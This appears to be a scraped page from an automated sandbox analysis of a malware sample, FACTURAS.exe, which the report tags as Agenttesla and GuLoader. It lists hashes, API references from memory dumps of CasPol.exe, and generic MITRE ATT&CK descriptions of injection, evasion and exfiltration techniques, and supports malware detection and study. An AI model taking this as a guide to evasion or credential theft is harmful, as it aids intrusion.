Source File: 00000006.00000002.22646006933.000000001DED0000.00000040.00000001.sdmp, Offset: 1DED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1ded0000_CasPol.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 84ab196bfffaf6fec4fbb3a869a332fc0740a48ac891ca6d792413c6ed25defe
Instruction ID: 4781cd350fdc5535a90d67454d2367cc63ffd7bca021a5614d04f8f90cc4d39d
Opcode Fuzzy Hash: 84ab196bfffaf6fec4fbb3a869a332fc0740a48ac891ca6d792413c6ed25defe
Instruction Fuzzy Hash: 1851B0B1D007499FDB14CF99C884ADEBBB5BF48314F64812EE819AB250DB70A945CF91

Uniqueness

Uniqueness Score: -1.00%

Function 1DEDA144, Relevance: 1.6, APIs: 1, Instructions: 97
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 1DEDB4E1

Memory Dump Source

Source File: 00000006.00000002.22646006933.000000001DED0000.00000040.00000001.sdmp, Offset: 1DED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1ded0000_CasPol.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: c4a51bb8de7cfe7a66f0b9f2c4af0ec257aeb5644f6b55cb5e92b7d1ed386ecc
Instruction ID: 797ba566e9c13c91fac3596a9e8583e6b4f730dae3a44b2a40038ca1f5d6af07
Opcode Fuzzy Hash: c4a51bb8de7cfe7a66f0b9f2c4af0ec257aeb5644f6b55cb5e92b7d1ed386ecc
Instruction Fuzzy Hash: 3C4129B8900705CFCB54CF99C488AAABBF5FF89314F14C459D519AB321EB74A841CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00E27AF0, Relevance: 1.6, APIs: 1, Instructions: 86
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

TerminateThread.KERNEL32(-34A3F2D7,0F78F34F), ref: 00E27C36

Memory Dump Source

Source File: 00000006.00000002.22636564268.0000000000E27000.00000040.00000001.sdmp, Offset: 00E27000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_e27000_CasPol.jbxd

Similarity

API ID: TerminateThread
String ID:
API String ID: 1852365436-0
Opcode ID: fedd8999b6a9f1431dfc766dd563f0fbba6d290a8a81489756c54397715a1a76
Instruction ID: 0c0a8a5dd56b64aa6a46536a1a646aa1a0be0ba75d91d4d66e47b056a071437d
Opcode Fuzzy Hash: fedd8999b6a9f1431dfc766dd563f0fbba6d290a8a81489756c54397715a1a76
Instruction Fuzzy Hash: DE31D330658326CFEF208F24EAD4BD533E2BF41724F9591A5CC981B255D3348986C755

Uniqueness

Uniqueness Score: -1.00%

Function 00B25490, Relevance: 1.6, Strings: 1, Instructions: 334
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

' Xm, xrefs: 00B25731

Memory Dump Source

Source File: 00000006.00000002.22636377269.0000000000B20000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b20000_CasPol.jbxd

Similarity

API ID:
String ID: ' Xm
API String ID: 0-1703789762
Opcode ID: 33fe4f497517c70f588eb59b8ccbfec2c2a9b3d40ab88d4259d8da12dbfc73f3
Instruction ID: aec57d93dedec7fa234ab32a202887d80290a1f6a65634bf2f19c1af8a9bc3dd
Opcode Fuzzy Hash: 33fe4f497517c70f588eb59b8ccbfec2c2a9b3d40ab88d4259d8da12dbfc73f3
Instruction Fuzzy Hash: 23B14730B086618FDB269B78D8547AE3BE2DF96304F1684F6E049CB2A2DA35CC45C752

Uniqueness

Uniqueness Score: -1.00%

Function 1DEDA54A, Relevance: 1.6, APIs: 1, Instructions: 66COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,1DEDA516,?,?,?,?,?), ref: 1DEDA5D7

Memory Dump Source

Source File: 00000006.00000002.22646006933.000000001DED0000.00000040.00000001.sdmp, Offset: 1DED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1ded0000_CasPol.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 355eab0d513ad69c74b984fd64df1b91f614176cb635975e5b6d0da2e6bd1a90
Instruction ID: dce64eedbeceb191ffd638d57ab0ae07eae5c0e97eecb12efd6b9db842b3a29a
Opcode Fuzzy Hash: 355eab0d513ad69c74b984fd64df1b91f614176cb635975e5b6d0da2e6bd1a90
Instruction Fuzzy Hash: 3121F4B5900208DFDB10CFAAD885ADEBBF4EF48320F14841AE915A7350D774AA44CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 1DED9ED8, Relevance: 1.6, APIs: 1, Instructions: 65COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,1DEDA516,?,?,?,?,?), ref: 1DEDA5D7

Memory Dump Source

Source File: 00000006.00000002.22646006933.000000001DED0000.00000040.00000001.sdmp, Offset: 1DED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1ded0000_CasPol.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 2cd96af6d1a91d0daf3273759bc4e4acd510a793c8bfb0f4e18ea0f2182ff42b
Instruction ID: 6d710eceb052c60fc4e072e43e1122027139adba84809272ed5be4f3e8ef194f
Opcode Fuzzy Hash: 2cd96af6d1a91d0daf3273759bc4e4acd510a793c8bfb0f4e18ea0f2182ff42b
Instruction Fuzzy Hash: 3821F2B59002489FCB10CFAAD884ADEBBF8EB48320F14841AE914A7211D774AA44CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00B248C0, Relevance: .5, Instructions: 539COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.22636377269.0000000000B20000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b20000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ab217dfccbde5006636196ad9e3f4f5f774d331de68a4dd39bc4c1b0e9e9336
Instruction ID: cccb7dcd2798f5a320854d4c26cd9e354a6cd65893b324277a8b06238bc4b681
Opcode Fuzzy Hash: 0ab217dfccbde5006636196ad9e3f4f5f774d331de68a4dd39bc4c1b0e9e9336
Instruction Fuzzy Hash: F641B130B043608FDB169B74D5596AD3BF2EF8A344B1444EAD445EB2A2DB398C46CB52

Uniqueness

Uniqueness Score: -1.00%

Function 00B24314, Relevance: .3, Instructions: 262COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.22636377269.0000000000B20000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b20000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 88de293eb91b1695b19dde7b627b09b0a6a8404fdfa36645fbbf8cdcc3eefd77
Instruction ID: ef70b9f9205a1feba5a7bedc5c8585d6dea499de5fa62524664db5e8f5ef4b0c
Opcode Fuzzy Hash: 88de293eb91b1695b19dde7b627b09b0a6a8404fdfa36645fbbf8cdcc3eefd77
Instruction Fuzzy Hash: F5B16C70E002298FDB10CFA9E8857DEBBF1EF49714F248569D818AB794EB749845CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00B20F88, Relevance: .1, Instructions: 142COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.22636377269.0000000000B20000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b20000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 930ed0fd9eb5079a9842997e35d508c892293875aea533a59b52abff440be4de
Instruction ID: 763e23fc7614a18cb46b206539752e0738bbcd32bf579b80a1507acde9e9b637
Opcode Fuzzy Hash: 930ed0fd9eb5079a9842997e35d508c892293875aea533a59b52abff440be4de
Instruction Fuzzy Hash: D2413A31B083704BDB184AB958942BB77EADFE5344F1848BAD50AC7781DF75CC868362

Uniqueness

Uniqueness Score: -1.00%

Function 00B24870, Relevance: .1, Instructions: 139COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.22636377269.0000000000B20000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b20000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 399d01ae247aea238709baacb152c09fc43420e0a8408ec6aee7a667d24f9aaf
Instruction ID: 601fce7f3467c441456c415fb5839e92569862a0acb818938271aae4dad003aa
Opcode Fuzzy Hash: 399d01ae247aea238709baacb152c09fc43420e0a8408ec6aee7a667d24f9aaf
Instruction Fuzzy Hash: 43514470D00628CFCB24CFA9D889BADBBF0FF48314F15816AD859AB251D774A844CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00B25894, Relevance: .1, Instructions: 135COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.22636377269.0000000000B20000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b20000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6122863588608fb2c7be0fe4f332ef856bcec0a8137cb54114e599b4be3c0ad5
Instruction ID: 34de2c2a9140a0e1e122070e9a56cbb76237f010bb278d42780665bd843c4d98
Opcode Fuzzy Hash: 6122863588608fb2c7be0fe4f332ef856bcec0a8137cb54114e599b4be3c0ad5
Instruction Fuzzy Hash: 02511270D10628CFDB24CFA9D889B9DBBF1FF48314F15816AD819AB251D774A884CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00B20C28, Relevance: .1, Instructions: 135COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.22636377269.0000000000B20000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b20000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b68cc3881aba89d00de74f0faf67ab070ea257aa23f09542fa2a325f743c1168
Instruction ID: 118417156d9c7fc91f07d433ccf8eda4dff418bf3f3cada9e15b790fbaf2d5ee
Opcode Fuzzy Hash: b68cc3881aba89d00de74f0faf67ab070ea257aa23f09542fa2a325f743c1168
Instruction Fuzzy Hash: 7D513F71D006188FDB14DFD9D488BDEFBF4AF48314F2481A9D809AB261DB74A94ACF91

Uniqueness

Uniqueness Score: -1.00%

Function 00B24860, Relevance: .1, Instructions: 135COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.22636377269.0000000000B20000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b20000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7db002a65a6b7b0641e880f505f252bac98f08917c99ee959d92581bdbe88b53
Instruction ID: b8d486071e10dffea35c184ad3f1c7a4748c3ce484c4ac09df94b1f060aff8ff
Opcode Fuzzy Hash: 7db002a65a6b7b0641e880f505f252bac98f08917c99ee959d92581bdbe88b53
Instruction Fuzzy Hash: C4510370D10628CFDB24CFA9D889B9DBBF1FF48314F15816AD819AB251DB74A844CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00B2487C, Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.22636377269.0000000000B20000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b20000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27ee2a84131fd8714c15ffceac57c52e0ed705c13497f61ac8fbe5460fed6f70
Instruction ID: 76681b71d8e76c3d7a00cb5135b67feeea7b139a0dc43cec92873ddf53fab272
Opcode Fuzzy Hash: 27ee2a84131fd8714c15ffceac57c52e0ed705c13497f61ac8fbe5460fed6f70
Instruction Fuzzy Hash: A5510370D10628CFDB24CFA9D889B9DBBF1FF48314F15816AD819AB251D774A844CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00B24C70, Relevance: .1, Instructions: 87COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.22636377269.0000000000B20000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b20000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef1b0da9814f8040a420bf7d8029db2a3f2f49b07bc83d75d33acab729b1a58c
Instruction ID: 03f5c15a7a25d7f055f5bdfd13d6f254878366b66c0963945e5459a92f0fb506
Opcode Fuzzy Hash: ef1b0da9814f8040a420bf7d8029db2a3f2f49b07bc83d75d33acab729b1a58c
Instruction Fuzzy Hash: 0B312A34B002248FDB14AB74D5557AE76F2EF89785B1004B9E806EB7A5DF398C42CB51

Uniqueness

Uniqueness Score: -1.00%

Function 00B214A8, Relevance: .1, Instructions: 77COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.22636377269.0000000000B20000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b20000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0d8afe339d0a50430fe989d73c1e4630e77655098924d21a3b7ef2a4a21e418b
Instruction ID: 2a55732e60b19795359b72a3741867240031170355fb0dc5dd9e95a9239389b9
Opcode Fuzzy Hash: 0d8afe339d0a50430fe989d73c1e4630e77655098924d21a3b7ef2a4a21e418b
Instruction Fuzzy Hash: 3A214B31B04220DFDB14DB78D55A6AD7BF1EF9A345B1048E9D406EB3A1DB368C41CB92

Uniqueness

Uniqueness Score: -1.00%

Function 1DD0D3D8, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.22645532764.000000001DD0D000.00000040.00000001.sdmp, Offset: 1DD0D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1dd0d000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cc9e66934df2fb1e6ac802aa5b7524dff5070610767e6e2f255573f0e9f17aba
Instruction ID: 49ac28c28dbbc0368a99edab2b4bc5b3fe984953b6797edcf52dd16455a79017
Opcode Fuzzy Hash: cc9e66934df2fb1e6ac802aa5b7524dff5070610767e6e2f255573f0e9f17aba
Instruction Fuzzy Hash: 92210671504240DFDB01CF58D9C0B5ABB69FBC4724F20C56AE9490B646C336E456C7A3

Uniqueness

Uniqueness Score: -1.00%

Function 1DD1D01C, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.22645642172.000000001DD1D000.00000040.00000001.sdmp, Offset: 1DD1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1dd1d000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c6b0e1217be6d2168c5edfb95bb659e1acf4012b9ec04a4e3d4339675b7302d0
Instruction ID: ae1370fbb88d005756f8ec4497f152567f81102c3e55f6ff16affd6353a3a42f
Opcode Fuzzy Hash: c6b0e1217be6d2168c5edfb95bb659e1acf4012b9ec04a4e3d4339675b7302d0
Instruction Fuzzy Hash: BC212575644241DFCB01EF28E8C4B16BBA5FB84714F20C9A9E8490F246C336D807CA62

Uniqueness

Uniqueness Score: -1.00%

Function 00B214B8, Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.22636377269.0000000000B20000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b20000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54916d6ee587bdfefc85251dc7a6279621fedb990be0cb295a911b637c82e2cc
Instruction ID: 5362100685ce4b1d48c5d99614c065361a021eef13c8fab401e169f1beee3ab2
Opcode Fuzzy Hash: 54916d6ee587bdfefc85251dc7a6279621fedb990be0cb295a911b637c82e2cc
Instruction Fuzzy Hash: 79212730B00220CFDB14EB78D5596AD77F1EFA9345B1008E8E40AEB361DB358C01CB91

Uniqueness

Uniqueness Score: -1.00%

Function 1DD1D005, Relevance: .1, Instructions: 62COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.22645642172.000000001DD1D000.00000040.00000001.sdmp, Offset: 1DD1D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1dd1d000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 118935aaf78100c3a01f76735d52893b4bad6f541a5f0d146a013e204fca4e09
Instruction ID: e2e6f34e11c41fd6058a07f0d48452772af98c34ce100a4e5d970f2a128b5a15
Opcode Fuzzy Hash: 118935aaf78100c3a01f76735d52893b4bad6f541a5f0d146a013e204fca4e09
Instruction Fuzzy Hash: 462192755487809FC702CF24E594B11BFB1EB46314F24C5EAE8498F297C33AD84ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 1DD0D3D3, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.22645532764.000000001DD0D000.00000040.00000001.sdmp, Offset: 1DD0D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_1dd0d000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f6b1150f96889345da33628416da925bcb2680613f61ca095340181328234d52
Instruction ID: 22c9fe27331106afc90318b807d8f74076842391d7752d284a5752f1cf0e47e2
Opcode Fuzzy Hash: f6b1150f96889345da33628416da925bcb2680613f61ca095340181328234d52
Instruction Fuzzy Hash: 3E11AF76504280DFCB01CF14D5C4B1ABF61FB84324F2486AAE8090B656C33AE456CBA2

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00B23A50, Relevance: .3, Instructions: 281COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.22636377269.0000000000B20000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b20000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ef0e139f7f9b8314c4c3157645e4426ac49d59e2088631a847757b80aeeec3cb
Instruction ID: 441cd0b7f44449fbf924fd8d5edfdde9a5b4130e0edb508cc8d8d19b02a7ddd8
Opcode Fuzzy Hash: ef0e139f7f9b8314c4c3157645e4426ac49d59e2088631a847757b80aeeec3cb
Instruction Fuzzy Hash: F0B18E70E002198FDF14CFA9D8857DEBBF2EF88B44F148579D819A7294EB389941CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00B23708, Relevance: .2, Instructions: 238COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.22636377269.0000000000B20000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b20000_CasPol.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fcbec02744f039fa8c4b74bfcd51c7a659fa9a1a025bb31fe22f578f3c9fce90
Instruction ID: 3bed94a341d63069242ad493d537d124d168b56ecb48ff16fca769b359a4c5ad
Opcode Fuzzy Hash: fcbec02744f039fa8c4b74bfcd51c7a659fa9a1a025bb31fe22f578f3c9fce90
Instruction Fuzzy Hash: 489192B0E002199FDF10CFA9D8857DDBBF2EF89704F148569E409AB294DB789D85CB81

Uniqueness

Uniqueness Score: -1.00%

Function 00B20006, Relevance: 5.1, Strings: 4, Instructions: 69COMMON

Download Yara Rule

Strings

\g& , xrefs: 00B2007A
\g& , xrefs: 00B2006A
\g& , xrefs: 00B200A7
\g& , xrefs: 00B20053

Memory Dump Source

Source File: 00000006.00000002.22636377269.0000000000B20000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b20000_CasPol.jbxd

Similarity

API ID:
String ID: \g& $\g& $\g& $\g&
API String ID: 0-1377626232
Opcode ID: 51faa4d16bfe8ce5379f451f967d984faa8f811e6a060b524aea4825b0b6a9a8
Instruction ID: 7d0ffc10ef65b2eef9c137bd80a1d636986ae7b6e4b6d79dc766af47f27a7cbf
Opcode Fuzzy Hash: 51faa4d16bfe8ce5379f451f967d984faa8f811e6a060b524aea4825b0b6a9a8
Instruction Fuzzy Hash: 4311C821B0D3A10FC75357B958A0267AFE78F9215871A89FFC489CB297DE658C0983A1

Uniqueness

Uniqueness Score: -1.00%

Function 00B20040, Relevance: 5.1, Strings: 4, Instructions: 67COMMON

Download Yara Rule

Strings

\g& , xrefs: 00B2007A
\g& , xrefs: 00B2006A
\g& , xrefs: 00B200A7
\g& , xrefs: 00B20053

Memory Dump Source

Source File: 00000006.00000002.22636377269.0000000000B20000.00000040.00000001.sdmp, Offset: 00B20000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b20000_CasPol.jbxd

Similarity

API ID:
String ID: \g& $\g& $\g& $\g&
API String ID: 0-1377626232
Opcode ID: 6d12f2ba6df5a731a49613937b01e7fed1afbc46bc7327bdefd6d7612750a216
Instruction ID: 8c937968e95a967774eb5cf02a328aedefd15fa0a6ff07cfa16ef55873f27182
Opcode Fuzzy Hash: 6d12f2ba6df5a731a49613937b01e7fed1afbc46bc7327bdefd6d7612750a216
Instruction Fuzzy Hash: 7811C811B092700B9B2966FE1CA436F55DB8FC2158B19C8BBD949CB396EE25CC0653E2

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may disable security tools to avoid possible detection of their tools and activities. This can take the form of killing security software or event logging processes, deleting Registry keys so that tools do not start at run time, or other methods to interfere with security tools scanning or reporting information.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Services, Windows Registry
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, File monitoring, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Malware reverse engineering, Netflow/Enclave netflow, Packet capture, Process monitoring, Process use of network, SSL/TLS inspection
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Files may be copied from an external adversary controlled system through the command and control channel to bring tools into the victim network or through alternate protocols with another tool such as FTP. Files can also be copied over on Mac and Linux with native tools like scp, rsync, and sftp.
Tactics:	Command and Control
Data Sources:	File monitoring, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process command-line parameters, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use a non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Host network interface, Netflow/Enclave netflow, Network intrusion detection system, Network protocol analysis, Packet capture, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	DNS records, Netflow/Enclave netflow, Network protocol analysis, Packet capture, Process monitoring, Process use of network
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Windows Analysis Report FACTURAS.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Agenttesla

Threatname: GuLoader

Yara Overview

Memory Dumps

Sigma Overview

Jbx Signature Overview

AV Detection:

Compliance:

Networking:

System Summary:

Data Obfuscation:

Hooking and other Techniques for Hiding and Protection:

Malware Analysis System Evasion:

Anti Debugging:

HIPS / PFW / Operating System Protection Evasion:

Language, Device and Operating System Detection:

Lowering of HIPS / PFW / Operating System Security Settings:

Stealing of Sensitive Information:

Remote Access Functionality:

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

Contacted IPs

Public

General Information

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASN

JA3 Fingerprints

Dropped Files

Created / dropped Files

Static File Info

General

File Icon

Static PE Info

General

Entrypoint Preview

Data Directories

Sections

Resources

Imports

Version Infos

Possible Origin

Network Behavior

Network Port Distribution

TCP Packets

UDP Packets

DNS Queries

DNS Answers

HTTP Request Dependency Graph

HTTPS Proxied Packets

Function 0041C944, Relevance: 265.1, APIs: 125, Strings: 26, Instructions: 884
COMMON

